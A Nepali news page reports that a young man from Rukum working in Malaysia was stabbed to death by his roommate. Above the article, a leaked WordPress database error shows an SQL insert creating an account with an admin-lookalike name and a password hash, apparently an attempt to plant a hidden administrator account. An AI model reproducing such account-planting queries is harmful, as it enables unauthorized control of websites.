WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BoxqSV8OHpnklk504E1MiMEI8tNXNM/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 07:59:03', '', 'admlnlx', 'admlnlx')
रुकुम, माघ १९ –
रोजगारीको सिलसिलामा मलेसिया गएका एक रुकुमेलीको आफ्नै साथीको छुरा प्रहारबाट ज्यान गएको छ ।
रुकुमको बाँफीकोट– १ का २४ वर्षका अनन्त उखिराको आफ्नै साथीले छुरा प्रहार गर्दा मंगलबार ज्यान गएको आफन्तले जानकारी दिएका छन् ।
६ महिनादेखि कम्पनीबाट भागेर बाहिर काम गर्दै आएका उखिरालाई एउटै कोठामा बस्ने सल्यानका आफ्नै साथीले छुरा प्रहार गरेको उहाँका आफन्त बलबहादुर विकले जानकारी दिनुभयो ।
कोठामा दुई जनाबिच सामान्य विवाद हुँदा सल्यानका गोपाल परियारले सोमबार राति छुरा प्रहार गरेको विकले बताउनुभयो ।
तीन वर्ष पहिले मलेसिया गएका उहाँका एक छोरा र एक छोरी रहेका छन् । उखिराको शवलाई नेपाल ल्याइदिन र दोषीलाई कडाभन्दा कडा कारबाही गर्नका लागि परिवारले सरकारसँग अनुरोध गरेको छ । – रासस